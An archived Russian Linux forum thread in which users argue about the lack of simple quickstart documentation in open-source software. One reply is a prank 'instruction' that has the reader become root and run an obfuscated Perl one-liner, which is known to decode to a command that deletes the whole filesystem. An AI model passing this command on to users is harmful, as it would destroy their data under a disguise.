LINUX.ORG.RU
ФорумTalks

четыре строчки, которые изменили бы мир

0

0

Почему разработчики (95%) с маниакальным упорством не хотят, чтобы ихними программами можно было пользоваться прямо сейчас?

Успех gui не в отсутствии консоли, а в том, что если ты что-то хочешь сделать - у тебя есть хотя бы иллюзия того, что ты можешь это делать, и ты хотя бы что-то делаешь. Если ты можешь что-то сделать, и понимаешь это - тут командное управление будет гораздо удобнее визуального (ведь всегда удобнее сказать "поди туда сделай то", чем подойти и ткнуть носом в каждую точку назначения)

Вот сейчас я пытался прикрутить вместо sshfs remotefs, поддержать лоровского производителя. Я прочитал маны, сайт, такое ощущение, что авторы разговаривают с каким-то только им ведомым пользователем, который протестировал уже их предыдущие 10 версий. Я понимаю, что решение очевидно, но только тем, кто начинает понимать, о чём говорит автор?

Почему бы всем-всем авторам не делать квикстарт - забыть всё-всё про свою программу, и написать на самом видном месте 4 строчки - что сделать, чтобы посмотреть, как работает программа, и воспользоваться всеми её приемуществами?

Ответ на: комментарий от alpha-fc

> Скрепка от Микрософта

она не отвечала на вопрос "хочу то, что меня интересует", жила какой-то своей жизнью, для ms это была не научная проблема, а коммерческая.

ARHL
() автор топика
Ответ на: комментарий от nikolayd

ух, категорично-то как

заметь: "идиот говорит так, что его никто не понимает" не значит, что тот, кто говорит непонятно для тебя - идиот

alpha-fc
()

> Проще ребутнуться в винду и вырезать все пеинте за 5 секунд.

если не касаться заявленного вопроса, то всё же лучше потратить полчаса на туториал в гимп, чем пять лет на изучение и поддерживание винды

это называется "испорченность"

ARHL
() автор топика

> вот разработчики гимпа - полнейшие идиоты, потому как тратить полчаса на туториалы чтобы научится вырезать кусок картинки - это ...

А мне кажется, что идиот тут кто-то другой.

Все в конторе сидят на гимпе и ни разу не жужжат ни про "пейнт" ни про фотошоп.

Deleted
()
Ответ на: комментарий от ARHL

> чтобы тебя так на хирургическом столе обслуживали

Ты дурачок? Сравнивать здоровье человека и работу с программой?

> там наверное тоже считают клиническими идиотами всех, кто не умеет аппендицит вырезать

Ну не так утрированно, конечно, но да. Когда люди вместо логичных действий при некоторых ситуациях ведут себя как идиоты, да, считают :) Мне как-то врач впоследствии сказал, что я повёл себя как идиот. Теперь я стараюсь себя не вести как идиот :)

Deleted
()

ну ты вот тоже хочешь какую-то систему, которая бы знала сама какой ответ тебе нужен и за тебя выбирала - скрепка, она и есть )

вообще это конечно здравая и очевидная мысль: надо уделять больше внимания документации и стараться сделать её объективно понятной и юзабельной

все остальное - какая-то мешанина претензий и идей

глобальные проекты тут не нужны, просто видишь у кого-то кривую доку - помоги да поправь

alpha-fc
()
Ответ на: комментарий от a3

> она падает через каждые 5 минут. Может ли себе позволить такое автор коммерческой программы? Думаю нет, иначе его очень скоро не станет.

Расскажите об это мелкософту с вендо 3.11 и 95. Реально каждые 5 минут падало. :)

atrus ★★★★★
()
Ответ на: комментарий от delilen

> не знаю какие там еще три, но это первая:

Это не первая.

1. Откройте консоль/залогиньтесь.
2. Наберите su - и введите пароль root.
3. введите
perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
4. Нажмите reset

P.S. Для Ubuntu строчка №2 будет выглядеть как "Наберите sudo /bin/sh" и введите свой пароль.

atrus ★★★★★
()

>четыре строчки, которые изменили бы мир

Я думал здесь о чём-то высоком, у меня в голове уже начали бурлить фантазии на тему "а что бы я сказал чтоб изменить мир", за ними "зачем сказать?" "кому сказать?" "ты уверен что это кому-то нужно?" и т.д. и т.п. Захожу, а тут кисломолочное нытьё - я неосилил remotefs! фу, как мерзко. Пошёл очищать свою ауру от грубых, низкочастотных вибраций.

Sherak ★☆
()
Ответ на: комментарий от Sherak

> Я думал здесь о чём-то высоком, у меня в голове уже начали бурлить фантазии на тему "а что бы я сказал чтоб изменить мир", за ними "зачем сказать?" "кому сказать?" "ты уверен что это кому-то нужно?" и т.д. и т.п. Захожу, а тут кисломолочное нытьё - я неосилил remotefs! фу, как мерзко. Пошёл очищать свою ауру от грубых, низкочастотных вибраций.

вот на кого действительно по барабану, так это на remotefs. а вот что действительно беспокоит - так это то, что это тенденция.

а вообще - словами миру не поможешь

ARHL
() автор топика

> глобальные проекты тут не нужны, просто видишь у кого-то кривую доку - помоги да поправь

глобальные проекты нужны, потому что нужна централизаця

примеры - википедия, фидо, телефония и много чего ещё.

ARHL
() автор топика

> ух, категорично-то как

Ну почему сразу категорично, вот то, что гимподевелоперы имбецилы - очевидно.

Вообще, я навскидку только три софтины с угребищным интерфейсом назову - недоделанный глюкавый "аналог" аксеса из ООо, гимп и МСО 2007.

Да наркоманский nauphone и то понятнее.

nikolayd
()

>- зачем мне столько совершенно мне ненужной информации? если по каждому поводу забивать голову ненужной информацией, то это не голова будет, а не знаю что

ничего с твоей головой не будет.

>- тот факт, что в морской воде много воды не уталит мою жажду, а что на свалке много калорий - голол. главное не знать, что что-то есть, а где оно есть. разница между огромным количеством игр, фильмов и интернетов и чёрным дохлым экраном - несколько изменённых байт в бутсекторе или bios. и ничего ты с этим не поделаешь. вопрос - понятно, что я имею ввиду?

напиши 4 строчки о том как тебя понимать. 

> когда я вижу слово гугль - я зверею.

найди себе бабу.

quaternion
()

Пытался писать документацию к своему коду - плюнул и отложил на потом, ибо фигня какая то выходит

bioreactor ★★★★★
()

> Программы монстры - тут особый случай. Это ведь по сути набор микропрограмм-функций. Четыре строчки должно быть не для программы, а для функции.

И будет 4000 строк, пугающие любого своим количеством?

> справочная система должна знать, знает ли человек такое-то, или не знает, чтобы не выдавать ему лишнего и не отвлекать его от нужного.

В автоподсказке OpenOffice такое попробовали сделать.

question4 ★★★★★
()
Ответ на: комментарий от question4

А ведь автора так кажется никто и не осилил. Согласен слог у него достаточно сложный, и тег вещества явно не поменашл бы, но ведь проблема то затронута очень насущная!

Вот все говорят кури маны, а там порой информации мноого а что делать и после пятого пристального прочтения нифига не понятно. Выручают опыт и смекалка. Но ведь для неопытного юзера оно же реально как тёмный лес!

порой в команде можно разобраться не после прочтения мана а после добавления -h или --help, информация зачастую коротко и по делу. Но опять же так бывает не всегда, и приходится гуглить, пытать гуру и т.п.

Те 4 строчки о которых говорил автор это была бы просто великолепная шапка для каждого мана! А впрочем если бы маны писались по всем каноном с подробным полем примеров применения то уже было бы куда проще.

Messing
()
Ответ на: комментарий от Score-49

Вообще-то, если поступить по принципу "Сперва добейся", то после достижения цели ни критиковать, ни трындеть не по делу не захочется.
Ибо будет понимание, почему оно так, а не иначе; будет опыт, который позволит более трезво, взвешенно, толково и менее категорично давать оценку чему-либо.

Slavaz ★★★★★
()
Ответ на: комментарий от quaternion

>- зачем мне столько совершенно мне ненужной информации? если по каждому поводу забивать голову ненужной информацией, то это не голова будет, а не знаю что

> ничего с твоей головой не будет.

если ты так думаешь, то трудно будет тебе как-то это объяснить. вот если я решаю какую-то проблему по ядерной физике, и мне понадобилось постоянно отсылать результаты. я знаю про remotefs, я знаю, что она мне поможет, я берусь её настраивать... в итоге у меня в голове стало гораздо меньше ядерной физики, я потерял суть своей проблемы.

Просто делать - хорошо, отвлекаться - плохо.

> напиши 4 строчки о том как тебя понимать.

когда голова забито гуглем - ты уже привык, что гугль тебе всё разжуёт

> найди себе бабу.

своих девать некуда

ARHL
() автор топика
Ответ на: комментарий от ip1981

> Если ты не можешь понять программу - она тебе не нужна... Тебе нужна не она.

если ты не можешь понять устройства антибиотика - он тебе не нужен. съешь ещё этих мягких французских корешков и травок...

ARHL
() автор топика
Ответ на: комментарий от Gary

> А как же установка Gentoo за три команды?

про gentoo юзеру пока лучше не знать - по разным причинам, хотя я не вижу проблем и в генту для home пользователей, и в установке gentoo за три команды

ARHL
() автор топика
Ответ на: комментарий от question4

> И будет 4000 строк, пугающие любого своим количеством?

Я же сказал, по сути разницы между (маном программы конверт и программы ресайз имеджика) и (маном пункта меню конверт и пункта меню ресайз гимпа) нет. Некоторые программы не юниксвейны, ни "программа-функция", и они просто будут разбиты на части, если они легко разбиваются, как гимп - графическая оболочка для плюгинов.

ARHL
() автор топика
Ответ на: комментарий от Slavaz

> Вообще-то, если поступить по принципу "Сперва добейся", то после достижения цели ни критиковать, ни трындеть не по делу не захочется.

Я же говорил - я пишу доки, хелпы, факи и уоки-токи. Сейчас я документирую ауструми, несколько дней к нему прикасаться не буду, чтобы забыть, а потом буду по докам попытаться восстановить всю последовательность, и править доки уже под это.

Программы я тоже писал, разные

ARHL
() автор топика
Ответ на: комментарий от Gary

>А как же установка Gentoo за три команды?

А что с ней? Можно и одной...

wyldrodney
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.